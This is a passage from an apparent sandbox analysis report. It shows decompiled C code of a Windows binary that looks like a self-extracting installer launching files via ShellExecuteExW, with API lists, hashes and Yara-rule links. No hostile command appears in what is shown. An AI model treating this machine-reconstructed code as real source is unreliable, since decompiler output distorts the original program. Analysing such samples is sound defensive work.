											_t272 = E00CC4DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E00CB11FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E00CAD9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00CC2B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E00CAFA56(_t390 - 0xd4, 0xcd2624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00CC2B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00CB3393(_t387, _t370, _t380);
						E00CB3393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0xcdd5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}








































































                0x00cacfd0
                0x00cacfd0
                0x00cacfd1
                0x00cacfd9
                0x00cacfe3
                0x00cacfed
                0x00cacfee
                0x00cacfef
                0x00cacff2
                0x00cacff4
                0x00cacff7
                0x00cacffa
                0x00cad000
                0x00cad002
                0x00cad005
                0x00cad00b
                0x00cad047
                0x00cad00d
                0x00cad015
                0x00cad02d
                0x00cad037
                0x00cad037
                0x00cad052
                0x00cad057
                0x00cad05f
                0x00cad062
                0x00cad070
                0x00cad42d
                0x00cad433
                0x00cad43e
                0x00cad449
                0x00cad076
                0x00cad076
                0x00cad078
                0x00cad07e
                0x00cad09c
                0x00cad0a8
                0x00cad0ba
                0x00cad0bf
                0x00cad0c2
                0x00cad0c5
                0x00cad0c8
                0x00cad0cb
                0x00cad0ce
                0x00cad0e2
                0x00cad0f7
                0x00cad0fc
                0x00cad0ff
                0x00cad101
                0x00cad101
                0x00cad104
                0x00cad109
                0x00cad1c8
                0x00cad1c8
                0x00cad1cb
                0x00cad1ce
                0x00cad1df
                0x00cad1e7
                0x00cad1e8
                0x00cad1eb
                0x00cad1f0
                0x00000000
                0x00000000
                0x00cad1f6
                0x00cad1f9
                0x00000000
                0x00000000
                0x00000000
                0x00cad1f9
                0x00000000
                0x00cad10f
                0x00cad117
                0x00cad142
                0x00cad144
                0x00cad14d
                0x00cad178
                0x00cad180
                0x00cad1ac
                0x00cad1ac
                0x00cad1b0
                0x00000000
                0x00000000
                0x00cad1b2
                0x00000000
                0x00cad18c
                0x00cad19c
                0x00cad1a1
                0x00cad1a6
                0x00000000
                0x00000000
                0x00000000
                0x00cad1a6
                0x00cad180
                0x00cad155
                0x00cad15b
                0x00cad16c
                0x00cad171
                0x00cad176
                0x00cad1ba
                0x00000000
                0x00cad1ba
                0x00cad176
                0x00000000
                0x00cad123
                0x00cad133
                0x00cad138
                0x00cad13d
                0x00cad1be
                0x00cad1be
                0x00cad1c1
                0x00cad1c3
                0x00000000
                0x00cad1c3
                0x00cad13f
                0x00000000
                0x00cad13f
                0x00cad117
                0x00cad10f
                0x00cad208
                0x00cad20b
                0x00cad210
                0x00cad21a
                0x00cad21c
                0x00cad220
                0x00cad222
                0x00000000
                0x00000000
                0x00cad239
                0x00cad23e
                0x00cad241
                0x00cad243
                0x00cad253
                0x00cad254
                0x00cad259
                0x00cad25d
                0x00cad25f
                0x00000000
                0x00000000
                0x00cad265
                0x00cad268
                0x00cad26b
                0x00cad26f
                0x00cad275
                0x00cad27a
                0x00cad27e
                0x00cad281
                0x00cad284
                0x00cad284
                0x00cad289
                0x00cad28b
                0x00cad28d
                0x00cad28d
                0x00cad293
                0x00cad2a3
                0x00cad2a8
                0x00cad2ad
                0x00cad2b2
                0x00cad2b6
                0x00cad2b8
                0x00cad2c6
                0x00cad2ca
                0x00cad2cc
                0x00cad2ce
                0x00cad2d1
                0x00cad2d4
                0x00cad2d6
                0x00cad2d9
                0x00cad3c1
                0x00cad3ca
                0x00cad3d2
                0x00cad3da
                0x00cad3e1
                0x00cad3e4
                0x00cad3fe
                0x00cad40b
                0x00cad413
                0x00cad425
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cad3e6
                0x00cad3e6
                0x00cad3ea
                0x00cad3f3
                0x00cad3f8
                0x00cad3f9
                0x00cad3f9
                0x00000000
                0x00cad3e6
                0x00cad2df
                0x00cad2e6
                0x00cad2ed
                0x00cad2f4
                0x00cad2f4
                0x00cad2f7
                0x00cad2f9
                0x00cad5f5
                0x00cad5f5
                0x00cad5f9
                0x00cad5fa
                0x00cad5fd
                0x00000000
                0x00000000
                0x00cad603
                0x00cad607
                0x00cad659
                0x00cad65a
                0x00cad65d
                0x00cad683
                0x00cad690
                0x00cad695
                0x00cad698
                0x00cad69a
                0x00cad67b
                0x00cad67b
                0x00000000
                0x00cad67b
                0x00cad661
                0x00cad662
                0x00cad665
                0x00000000
                0x00000000
                0x00cad667
                0x00cad667
                0x00cad66d
                0x00000000
                0x00000000
                0x00cad676
                0x00cad67a
                0x00cad67a
                0x00000000
                0x00cad67a
                0x00cad609
                0x00cad60f
                0x00000000
                0x00000000
                0x00cad619
                0x00cad619
                0x00cad61c
                0x00cad643
                0x00cad645
                0x00cad648
                0x00cad649
                0x00cad64d
                0x00cad64e
                0x00cad651
                0x00000000
                0x00cad651
                0x00cad61e
                0x00cad61e
                0x00cad621
                0x00cad63f
                0x00000000
                0x00cad63f
                0x00cad623
                0x00cad623
                0x00cad626
                0x00cad63b
                0x00000000
                0x00cad63b
                0x00cad628
                0x00cad628
                0x00cad62b
                0x00cad637
                0x00000000
                0x00cad637
                0x00cad62e
                0x00cad631
                0x00000000
                0x00000000
                0x00cad633
                0x00000000
                0x00cad633
                0x00cad2ff
                0x00cad304
                0x00cad308
                0x00cad314
                0x00cad316
                0x00cad317
                0x00cad31b
                0x00cad508
                0x00cad50b
                0x00cad512
                0x00cad517
                0x00cad519
                0x00cad5ef
                0x00cad5ef
                0x00cad5f2
                0x00000000
                0x00cad5f2
                0x00cad52b
                0x00cad53c
                0x00cad541
                0x00cad546
                0x00cad548
                0x00000000
                0x00000000
                0x00cad550
                0x00cad563
                0x00cad575
                0x00cad587
                0x00cad596
                0x00cad5ab
                0x00cad5b0
                0x00cad5b3
                0x00cad5b5
                0x00cad5b7
                0x00cad5b7
                0x00cad5ba
                0x00cad5c0
                0x00cad5c0
                0x00cad5d3
                0x00cad5d3
                0x00cad5d5
                0x00cad5d8
                0x00cad5d9
                0x00cad5d9
                0x00cad5dd
                0x00cad5e0
                0x00000000
                0x00000000
                0x00cad5e2
                0x00cad5e2
                0x00cad5e2
                0x00cad5e6
                0x00cad3af
                0x00cad3af
                0x00000000
                0x00cad3af
                0x00cad5ec
                0x00cad5ec
                0x00cad5d9
                0x00cad5dd
                0x00cad5e0
                0x00000000
                0x00000000
                0x00000000
                0x00cad5e0
                0x00cad5d9
                0x00cad321
                0x00cad324
                0x00cad324
                0x00cad327
                0x00cad32a
                0x00cad331
                0x00cad338
                0x00cad33f
                0x00cad346
                0x00cad349
                0x00cad35a
                0x00cad361
                0x00cad366
                0x00cad36b
                0x00cad36c
                0x00cad36e
                0x00cad386
                0x00cad386
                0x00000000
                0x00cad386
                0x00cad373
                0x00cad375
                0x00cad37a
                0x00000000
                0x00000000
                0x00cad37c
                0x00cad37e
                0x00cad381
                0x00cad389
                0x00cad389
                0x00cad38a
                0x00cad38a
                0x00cad38f
                0x00cad392
                0x00cad394
                0x00cad396
                0x00cad44c
                0x00cad44f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cad455
                0x00cad455
                0x00cad455
                0x00cad459
                0x00cad45c
                0x00000000
                0x00000000
                0x00cad45e
                0x00cad45e
                0x00cad45e
                0x00cad462
                0x00cad467
                0x00cad46a
                0x00cad46f
                0x00cad470
                0x00cad472
                0x00cad475
                0x00cad496
                0x00cad498
                0x00cad4ad
                0x00cad4b2
                0x00cad4b5
                0x00cad4b8
                0x00cad4bb
                0x00cad4de
                0x00cad4e1
                0x00cad4e6
                0x00cad4e8
                0x00cad4e8
                0x00cad4fb
                0x00cad500
                0x00cad4bd
                0x00cad4c9
                0x00cad4d1
                0x00cad4d6
                0x00cad4d6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cad477
                0x00cad477
                0x00cad477
                0x00cad47a
                0x00000000
                0x00000000
                0x00cad47c
                0x00cad47f
                0x00cad482
                0x00cad48a
                0x00cad48d
                0x00cad48e
                0x00cad491
                0x00000000
                0x00000000
                0x00000000
                0x00cad491
                0x00cad493
                0x00000000
                0x00cad493
                0x00cad464
                0x00cad464
                0x00cad455
                0x00cad455
                0x00cad459
                0x00cad45c
                0x00000000
                0x00000000
                0x00000000
                0x00cad45c
                0x00cad455
                0x00cad3aa
                0x00000000
                0x00cad3aa
                0x00cad30a
                0x00cad30e
                0x00000000
                0x00000000
                0x00000000
                0x00cad3b2
                0x00cad3b2
                0x00cad3b2
                0x00cad3bb
                0x00cad3be
                0x00000000
                0x00cad2ba
                0x00cad2bb
                0x00000000
                0x00cad2c0
                0x00cad2b8
                0x00cad245
                0x00cad247
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cad080
                0x00cad080
                0x00cad083
                0x00cad08c
                0x00cad091
                0x00cad092
                0x00cad092
                0x00cad09a
                0x00000000
                0x00cad09a

                APIs
                • __EH_prolog.LIBCMT ref: 00CACFD9
                • _wcschr.LIBVCRUNTIME ref: 00CACFFA
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CAD015
                • __fprintf_l.LIBCMT ref: 00CAD4FB
                  • Part of subcall function 00CB0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CAB312,00000000,?,?,?,000202DA), ref: 00CB0FFA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-4124877899
                • Opcode ID: 16810ecb05289505c728c1bebaeb45eb1f982d10aa938c463203d47ddb5902ae
                • Instruction ID: 3ab41b9c5cc05ec0ac21b35c070730945183ed56c8050e8af8b7de682064a9f6
                • Opcode Fuzzy Hash: 16810ecb05289505c728c1bebaeb45eb1f982d10aa938c463203d47ddb5902ae
                • Instruction Fuzzy Hash: BD12B0B160030A9BDF24EFA4DC45BED37A9EF06718F10012AF91B97691EB71DA81DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBC190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E00CBA388(); // executed
				_t45 = GetDlgItem( *0xce75c8, 0x68);
				_t48 =  *0xce75d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0xce75e8; // 0x0
					E00CB8569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0xcd22e4);
					 *0xce75d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}












                0x00cbc197
                0x00cbc1b2
                0x00cbc1b9
                0x00cbc1bf
                0x00cbc1c1
                0x00cbc1c7
                0x00cbc1cf
                0x00cbc1de
                0x00cbc1e8
                0x00cbc1ea
                0x00cbc1ea
                0x00cbc1fe
                0x00cbc204
                0x00cbc214
                0x00cbc218
                0x00cbc21c
                0x00cbc221
                0x00cbc227
                0x00cbc232
                0x00cbc23c
                0x00cbc244
                0x00cbc244
                0x00cbc254
                0x00cbc25e
                0x00cbc26d
                0x00cbc271
                0x00cbc27f
                0x00cbc290
                0x00cbc290
                0x00cbc2a4

                APIs
                  • Part of subcall function 00CBA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                  • Part of subcall function 00CBA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                  • Part of subcall function 00CBA388: IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                  • Part of subcall function 00CBA388: TranslateMessage.USER32(?), ref: 00CBA3CC
                  • Part of subcall function 00CBA388: DispatchMessageW.USER32(?), ref: 00CBA3D6
                • GetDlgItem.USER32(00000068,00CFDE38), ref: 00CBC1A4
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB9D8F), ref: 00CBC1CF
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBC1DE
                • SendMessageW.USER32(00000000,000000C2,00000000,00CD22E4), ref: 00CBC1E8
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBC1FE
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBC214
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBC254
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBC25E
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBC26D
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBC290
                • SendMessageW.USER32(00000000,000000C2,00000000,00CD304C), ref: 00CBC29B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: 23bbcbb52bdadc3771131f3e23eccbfbcf89a3c6e434caf9f27b990ec00a1e68
                • Instruction ID: bda5eff7244c5138305872a7e9464634073897b4281307418555286d53162f5e
                • Opcode Fuzzy Hash: 23bbcbb52bdadc3771131f3e23eccbfbcf89a3c6e434caf9f27b990ec00a1e68
                • Instruction Fuzzy Hash: 7221F67124A7447BE311FB249C81FAF7B9CEF82754F000619F690AA1D1C7A59A098AB7
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E00CBC431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E00CBD940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00CC2B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E00CBE920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0xcea602 != _t77) {
								_a24 = 0xcea602;
							}
						}
						_a32 = 1;
						_t93 = E00CAB153(_t87);
						if(_t93 != 0 && E00CB1410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00CA9E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E00CAAED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0xce85f8 != _t77 || _a4168 != _t77 ||  *0xcfde21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0xcddf24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0xcddf20(_a56, 0x7d0);
								E00CBC8F0(_a48);
								if( *0xcfde21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0xcfde24) {
										 *0xcfde24 = _t68;
									}
									 *0xcfde22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00CB1410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0xce85f8 != 0 && _t54 == 0 &&  *0xcfde21 == _t54) {
									 *0xcfde28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}






















                0x00cbc431
                0x00cbc436
                0x00cbc43d
                0x00cbc444
                0x00cbc449
                0x00cbc695
                0x00cbc69d
                0x00cbc69d
                0x00cbc450
                0x00cbc45b
                0x00000000
                0x00cbc461
                0x00cbc464
                0x00cbc46c
                0x00cbc471
                0x00cbc478
                0x00cbc47b
                0x00cbc47f
                0x00cbc489
                0x00cbc48b
                0x00cbc48b
                0x00cbc493
                0x00cbc496
                0x00cbc49c
                0x00cbc4a0
                0x00cbc4a2
                0x00cbc4a2
                0x00cbc4a4
                0x00cbc4a8
                0x00cbc4ad
                0x00cbc4e5
                0x00cbc4e5
                0x00cbc4e9
                0x00cbc4eb
                0x00cbc4f4
                0x00cbc4ff
                0x00cbc4ff
                0x00cbc4f4
                0x00cbc508
                0x00cbc515
                0x00cbc519
                0x00cbc52a
                0x00cbc52a
                0x00cbc53d
                0x00cbc53f
                0x00cbc548
                0x00cbc549
                0x00cbc54d
                0x00cbc556
                0x00cbc556
                0x00cbc55f
                0x00cbc567
                0x00cbc56d
                0x00cbc580
                0x00cbc595
                0x00cbc597
                0x00cbc5a0
                0x00cbc5a4
                0x00cbc5a6
                0x00cbc5a6
                0x00cbc5a0
                0x00cbc5b1
                0x00cbc5bb
                0x00cbc5c7
                0x00cbc5e6
                0x00cbc5f0
                0x00cbc5f2
                0x00cbc5f2
                0x00cbc5f7
                0x00cbc5f7
                0x00cbc5c7
                0x00cbc602
                0x00cbc60a
                0x00cbc622
                0x00cbc629
                0x00cbc637
                0x00cbc637
                0x00cbc67f
                0x00cbc67f
                0x00cbc67f
                0x00cbc688
                0x00cbc691
                0x00cbc691
                0x00cbc688
                0x00000000
                0x00cbc694
                0x00cbc4af
                0x00cbc4b1
                0x00cbc4b9
                0x00cbc4bc
                0x00cbc649
                0x00cbc649
                0x00cbc64e
                0x00000000
                0x00000000
                0x00cbc647
                0x00cbc655
                0x00cbc659
                0x00cbc4c6
                0x00cbc4ca
                0x00cbc66a
                0x00cbc66e
                0x00cbc66e
                0x00cbc673
                0x00cbc676
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cbc4ca
                0x00cbc647
                0x00cbc650
                0x00cbc4c2
                0x00000000
                0x00cbc4dc
                0x00cbc4dc
                0x00cbc4dd
                0x00cbc4e0
                0x00000000
                0x00cbc4b9

                APIs
                • ShellExecuteExW.SHELL32(000001C0), ref: 00CBC55F
                • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00CBC5A4
                • GetExitCodeProcess.KERNEL32 ref: 00CBC5DC
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBC602
                • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00CBC691
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 6dfd24f348d787dd6cbfcbce2f5d4375725c6048b18659dcbde0472c1437559d
                • Instruction ID: 49d2fc7e4e0ff40c408d03d07f0110c947c506220412ff6f61b9140de7b3b287
                • Opcode Fuzzy Hash: 6dfd24f348d787dd6cbfcbce2f5d4375725c6048b18659dcbde0472c1437559d
                • Instruction Fuzzy Hash: 6F51BE718053809BDB319F60D990BFFB7E9AF95304F08081EF5E297151D7B19A88EB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC95A5, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00CC95A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xcdd668; // 0x814d2927
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E00CCDBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00CBE203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E00CC980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00CC9C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E00CC980D(_t100);
									goto L36;
								}
								_t61 = E00CC9C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E00CC980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
